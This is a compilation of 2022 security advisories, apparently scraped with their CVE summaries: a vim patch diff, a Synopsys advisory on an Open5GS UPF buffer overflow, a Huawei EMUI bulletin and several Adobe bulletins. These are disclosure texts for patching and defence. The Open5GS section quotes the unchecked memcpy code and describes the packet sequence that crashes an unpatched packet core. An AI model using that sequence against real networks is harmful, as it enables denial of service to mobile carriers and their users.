Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0483.

@@ -1173,6 +1173,8 @@ op\_replace(oparg\_T \*oap, int c)  
while (LTOREQ\_POS(curwin->w\_cursor, oap->end)) { int done = FALSE;  
n = gchar\_cursor(); if (n != NUL) { @@ -1186,6 +1188,7 @@ op\_replace(oparg\_T \*oap, int c) if (curwin->w\_cursor.lnum == oap->end.lnum) oap->end.col += new\_byte\_len - old\_byte\_len; replace\_character(c); done = TRUE; } else { @@ -1204,10 +1207,15 @@ op\_replace(oparg\_T \*oap, int c) if (curwin->w\_cursor.lnum == oap->end.lnum) getvpos(&oap->end, end\_vcol); } PBYTE(curwin->w\_cursor, c); // with "coladd" set may move to just after a TAB if (gchar\_cursor() != NUL) { PBYTE(curwin->w\_cursor, c); done = TRUE; } } } else if (virtual\_op && curwin->w\_cursor.lnum == oap->end.lnum) if (!done && virtual\_op && curwin->w\_cursor.lnum == oap->end.lnum) { int virtcols = oap->end.coladd;

CVE-2022-3234: patch 9.0.0483: illegal memory access when replacing in virtualedit mode · vim/vim@c249913

When Open5GS UPF receives a PFCP Session Establishment Request, it stores related values for building the PFCP Session Establishment Response. Once UPF receives a request, it gets the f_teid_len from incoming message, and then uses it to copy data from incoming message to struct f_teid without checking the maximum length. If the pdi.local_f_teid.len exceeds the maximum length of the struct of f_teid, the memcpy() overwrites the fields (e.g., f_teid_len) after f_teid in the pdr struct. After parsing the request, the UPF starts to build a response. The f_teid_len with its overwritten value is used as a length for memcpy(). A segmentation fault occurs, as a result of a memcpy(), if this overwritten value is large enough.

Posted by on Wednesday, September 14, 2022

_CVE-2022-39063 is a vulnerability in the Open5GS project, an open source implementation of 5G components._

The Synopsys Cybersecurity Research Center (CyRC) has exposed a denial-of-service vulnerability in Open5GS. Open5GS is an open source project that provides LTE and 5G mobile packet core network functionalities with an AGPLv3 or commercial license. It can be used to build private LTE/5G telecom networks by individuals or telecom network operators.

When Open5GS UPF receives a PFCP Session Establishment Request, it stores related values for building the PFCP Session Establishment Response. The following source code in open5gs/lib/pfcp/handler.c causes this issue.

/\* Code block for parsing incoming PFCP Session Establishment Request. \*/
if (message->pdi.local\_f\_teid.presence) {
    pdr->f\_teid\_len = message->pdi.local\_f\_teid.len;
    memcpy(&pdr->f\_teid, message->pdi.local\_f\_teid.data, pdr->f\_teid\_len);
    pdr->f\_teid.teid = be32toh(pdr->f\_teid.teid);
}

...

/\* Code block for building outgoing PFCP Session Establishment Response. \*/
if (pdr->f\_teid\_len) {
    memcpy(&pdrbuf\[i\].f\_teid, &pdr->f\_teid, pdr->f\_teid\_len);
    pdrbuf\[i\].f\_teid.teid = htobe32(pdr->f\_teid.teid);
 
    message->local\_f\_teid.presence = 1;
    message->local\_f\_teid.data = &pdrbuf\[i\].f\_teid;
    message->local\_f\_teid.len = pdr->f\_teid\_len;
}

Once UPF receives a request, it gets the f\_teid\_len from incoming message, and then uses it to copy data from incoming message to struct f\_teid without checking the maximum length. If the pdi.local\_f\_teid.len exceeds the maximum length of the struct of f\_teid, the memcpy() overwrites the fields (e.g., f\_teid\_len) after f\_teid in the pdr struct. After parsing the request, the UPF starts to build a response. The f\_teid\_len with its overwritten value is used as a length for memcpy(). A segmentation fault occurs if this overwritten value is large enough.

This vulnerability is caused by a memcpy() that doesn’t have the maximum length of the source and target structure validated, so a buffer overflow attack exploit is possible.

**Exploitation**

When connecting to the Open5GS UPF port (8805) for the PFCP protocol and sending an PFCP Association Setup Request followed by a PFCP Session Establishment Request with PDR.F-TEID.IPv6-Address set to a duplicated IPv6 address \[e.g., 16(0xff) 16(0xff)\], this buffer overflow attack causes a segmentation fault in Open5GS.

**Affected software**

Open5GS 2.4.9 and earlier versions

**Impact**

Exploitation of this vulnerability would lead to a denial-of-service for the LTE/5G mobile packet core network.

CVSS 3.1 base score: 8.2 (high)

CVSS 3.1 vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H/E:P/RL:O/RC:C

**Remediation**

Synopsys recommends upgrading to Open5GS commit 444e182 or later. The vulnerability is patched as of commit d99491a on August 12, 2022, and commit 444e182 on August 14, 2022.

**Discovery credit**

Qiang Li from the Synopsys Cybersecurity Research Center (CyRC) in Wuhan, China, discovered the issue using the Defensics® fuzz testing tool.

**Timeline**

*   August 10, 2022: Initial disclosure
*   August 16, 2022: Open5GS confirms vulnerability
*   August 17, 2022: Synopsys validates the fix
*   September 9, 2022: Open5GS version 2.4.10 is released – fixing the bug
*   September 14, 2022: Synopsys publishes advisory

**About CVSS**

FIRST.Org, Inc (FIRST) is a non-profit organization based out of US that owns and manages CVSS. It is not required to be a member of FIRST to utilize or implement CVSS but FIRST does require any individual or organization give appropriate attribution while using CVSS. FIRST also states that any individual or organization that publishes scores follow the guideline so that anyone can understand how the scare was calculated.

**Stay on top of the latest in application security**

Subscribe to the blog

CVE-2022-39063: CyRC Vulnerability Advisory: Denial-of-service vulnerabilities (CVE-2022-39063) in Open5GS

Out-of-bounds write vulnerability in the power consumption module. Successful exploitation of this vulnerability may cause the system to restart.

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the August 2022 Android security bulletin:

Critical: none

High: CVE-2021-39696, CVE-2022-20344, CVE-2022-20346, CVE-2022-20347, CVE-2022-20348, CVE-2022-20349, CVE-2022-20350, CVE-2022-20355, CVE-2022-20358, CVE-2022-22080

Medium: CVE-2021-3609, CVE-2022-1055, CVE-2022-20158, CVE-2022-20368, CVE-2022-20371, CVE-2022-27666, CVE-2022-29581

Low: none

Already included in previous updates: CVE-2022-20219, CVE-2022-21744, CVE-2022-20083, CVE-2022-20126, CVE-2022-20133, CVE-2021-35102, CVE-2021-35120, CVE-2021-30318, CVE-2021-1942, CVE-2021-35104

※ For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the following HUAWEI patches:

CVE-2021-40019: Out-of-bounds heap read vulnerability in the HW\_KEYMASTER module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may cause out-of-bounds access.

CVE-2021-40023: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2021-40024: Information leakage vulnerability in the interface implementation of the WLAN module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2021-46836: Information leakage vulnerability in the interface implementation of the WLAN module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-37008: Vulnerability of the update package not being verified before used in the recovery module

Severity: Medium

Affected versions: EMUI 10.1.1, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect system stability.

CVE-2022-38977: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38978: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38979: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38980: Configuration defects in the secure OS module

Severity: High

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38981: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38982: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38983: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38984: Configuration defects in the secure OS module

Severity: High

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38985: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38986: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38987: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38988: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38989: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38990: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38991: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38992: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38993: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38994: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38995: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38996: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38997: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38999: Improper update of reference count vulnerability in the AOD module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect integrity, confidentiality, and availability.

CVE-2022-39000: Malicious app control vulnerability in the iAware module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will cause malicious apps to automatically start upon system startup.

CVE-2022-39001: Path traversal vulnerability in the number identification module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will cause data leakage.

CVE-2022-39002: Double free vulnerability in the storage module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will cause the memory to be freed twice.

CVE-2022-39003: Buffer overflow vulnerability in the video framework

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect the confidentiality and integrity of trusted components.

CVE-2022-39004: Memory leak vulnerability in the MPTCP module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability can cause memory leak.

CVE-2022-39005: Memory leak vulnerability in the MPTCP module

Severity: Medium

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability can cause memory leak.

CVE-2022-39006: Race condition vulnerability in the MPTCP module

Severity: Critical

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause the device to restart.

CVE-2022-39007: Permission verification bypass vulnerability in the Location module

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may lead to privilege escalation.

CVE-2022-39008: Bundle serialization/deserialization mismatch vulnerability in the NFC module

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause third-party apps to read and write arbitrary system app files.

CVE-2022-39009: Permission verification vulnerability in the WLAN module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause third-party apps to affect WLAN functions.

CVE-2022-39010: Permission control vulnerability in the HwChrService module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause third-party apps to obtain the user network information.

CVE-2020-36600: Out-of-bounds write vulnerability in the power consumption module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause the system to restart.

Acknowledgment: Wen Guanxing

CVE-2020-36601: Out-of-bounds write vulnerability in the kernel modules

Severity: Medium

Affected versions: EMUI 10.1.0, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause a panic reboot.

Acknowledgment: Wen Guanxing

CVE-2020-36600: September

Adobe Photoshop versions 22.5.8 (and earlier) and 23.4.2 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Photoshop | APSB22-52

**Bulletin ID**

**Date Published**

**Priority**

APSB22-52

Sept 13,  2022        

3

**Summary**

Adobe has released an update for Photoshop for Windows and macOS. This update resolves critical and important vulnerabilities.  Successful exploitation could lead to arbitrary code execution and memory leak.

**Affected Versions**

22.5.8 and earlier versions       

23.4.2 and earlier versions

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app’s update mechanism.  For more information, please reference this help page.    

**Product**

**Updated versions**

**Platform**

**Priority**

Photoshop 2021  

22.5.9

Windows and macOS  

3  

Photoshop 2022

23.5

Windows and macOS

3

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.

**Vulnerability details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**   

**CVSS vector**  

**CVE Number**

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35713  

Access of Uninitialized Pointer (CWE-824)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38426  

Access of Uninitialized Pointer (CWE-824)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38427  

Use After Free (CWE-416)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-38428  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38429  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38430  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38431  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38432  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38433  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H  

CVE-2022-38434  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:   

*   Mat Powell of Trend Micro Zero Day Initiative - CVE-2022-35713, CVE-2022-38426, CVE-2022-38427, CVE-2022-38428, CVE-2022-38429, CVE-2022-38430, CVE-2022-38431, CVE-2022-38432, CVE-2022-38433, CVE-2022-38434

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2022-35713: Adobe Security Bulletin

Adobe InCopy version 17.3 (and earlier) and 16.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Update Available for Adobe InCopy | APSB22-53

**Bulletin ID**

**Date Published**

**Priority**

APSB22-53

September 13, 2022

3

**Summary**

Adobe has released a security update for Adobe InCopy.  This update addresses multiple  critical and an important vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.                    

**Affected versions**

16.4.2 and earlier version  

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their software installations via the Creative Cloud desktop app updater, or by navigating to the InCopy Help menu and clicking "Updates." For more information, please reference this help page.

**Product**

**Updated version**

**Platform**

**Priority rating**

Adobe InCopy   

17.4  

Windows  and macOS    

3

Adobe InCopy   

16.4.3  

Windows  and macOS    

3

For managed environments, IT administrators can use the Creative Cloud Packager to create deployment packages. Refer to this help page for more information.

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**    

**CVSS vector**   

**CVE Number**

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical 

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38401  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical 

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38402  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38403  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38404  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38405  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-38406  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-38407  

**Acknowledgments**

Adobe would like to thank the following researchers for reporting this issue and for working with Adobe to help protect our customers.  

*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-38401, CVE-2022-38402, CVE-2022-38403, CVE-2022-38404, CVE-2022-38405, CVE-2022-38406, CVE-2022-38407 )  
    

**Revisions**

July 13, 2022: Bulletin revised for inclusion of CVE-2022-34249, CVE-2022-34250, CVE-2022-34251 and CVE-2022-34252  
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2022-38406: Adobe Security Bulletin

Adobe InDesign versions 16.4.2 (and earlier) and 17.3 (and earlier) are affected by by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Update Available for Adobe InDesign | APSB22-50

**Bulletin ID**

**Date Published**

**Priority**

APSB22-50  

September 13, 2022   

3

**Summary**

Adobe has released a security update for Adobe InDesign.  This update addresses multiple critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution, arbitrary file system read  
and memory leak.  

**Affected versions**

17.3 and earlier versions  

16.4.2 and earlier versions  

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their software installations via the Creative Cloud desktop app updater, or by navigating to the InDesign Help menu and clicking "Updates." For more information, please reference this help page.

**Product**

**Updated version**

**Platform**

**Priority rating**

Adobe InDesign

17.4  

Windows and macOS

3

Adobe InDesign

16.4.3  

Windows and macOS

3

For managed environments, IT administrators can use the Creative Cloud Packager to create deployment packages. Refer to this help page for more information.

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**    

**CVSS vector**   

**CVE Number**

Improper Input Validation (CWE-20)  

Arbitrary file system read  

Critical

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  

CVE-2019-17221\*

  
\*Updating open-source PhantomJS library

\*This CVE is only available in the latest version, ID 17.4

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28852  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28853  

Out-of-bounds Read (CWE-125)  

Memory Leak

Imortant

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-28854  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-28855  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-28856  

Out-of-bounds Read (CWE-125)  

Memory Leak  

Important  

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-28857  

Out-of-bounds Read (CWE-125)  

Memory Leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30671  

Out-of-bounds Read (CWE-125)  

Memory Leak  

Important  

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30672  

Out-of-bounds Read (CWE-125)  

Memory Leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30673  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30674  

Out-of-bounds Read (CWE-125)  

Memory Leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30675  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30676  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38413  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38414  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38415  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38416  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38417  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:   

*   Yonghui Han of Fortinet's FortiGuard Labs - CVE-2022-28852, CVE-2022-28853, CVE-2022-28854, CVE-2022-28855, CVE-2022-28856, CVE-2022-28857, CVE-2022-30671, CVE-2022-30672, CVE-2022-30673, CVE-2022-30674, CVE-2022-30675, CVE-2022-30676
*   Mat Powell of Trend Micro Zero Day Initiative - CVE-2022-38413, CVE-2022-38414, CVE-2022-38415, CVE-2022-38416, CVE-2022-38417

**Revisions:**

*   **July 13, 2022:** Bulletin APSB22-30 revised to include (CVE-2022-34245, CVE-2022-34246, CVE-2022-34247, CVE-2022-34248)
*   **July 16, 2022:** Changed CVE-2022-28851 to 3rd party open-source library vulnerability PhantomJS CVE-2019-17221

CVE-2022-28852: Adobe Security Bulletin

Adobe Animate version 21.0.11 (and earlier) and 22.0.7 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security updates available for Adobe Animate | APSB22-54

Bulletin ID

Date Published

Priority

ASPB22-54

September 13, 2022    

3

**Summary**

Adobe has released an update for Adobe Animate. This update resolves critical vulnerabilities.  Successful exploitation could lead to arbitrary code execution in the context of the current user.        

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Animate 2021

21.0.11 and earlier versions

Windows and macOS

Adobe Animate 2022  

22.0.7 and earlier versions  

Windows and macOS  

**Solution**

Adobe categorizes this update with the following  priority rating and recommends users update their installation to the newest version via the Creative Cloud desktop app's update mechanism.  For more information, please reference this help page.

Product

Version

Platform

Priority

Availability

Adobe Animate 2021       

21.0.12

Windows and macOS  

3

Download Center  

Adobe Animate  2022      

22.0.8

Windows and macOS

3

Download Center       

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.  

**Vulnerability details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**   

**CVSS vector**  

CVE Numbers

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38411  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38412  

**Acknowledgments**

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:

*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-38411, CVE-2022-38412)

**Revisions**

June 21, 2022: Revision to affected versions table.

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2022-38411: Adobe Security Bulletin

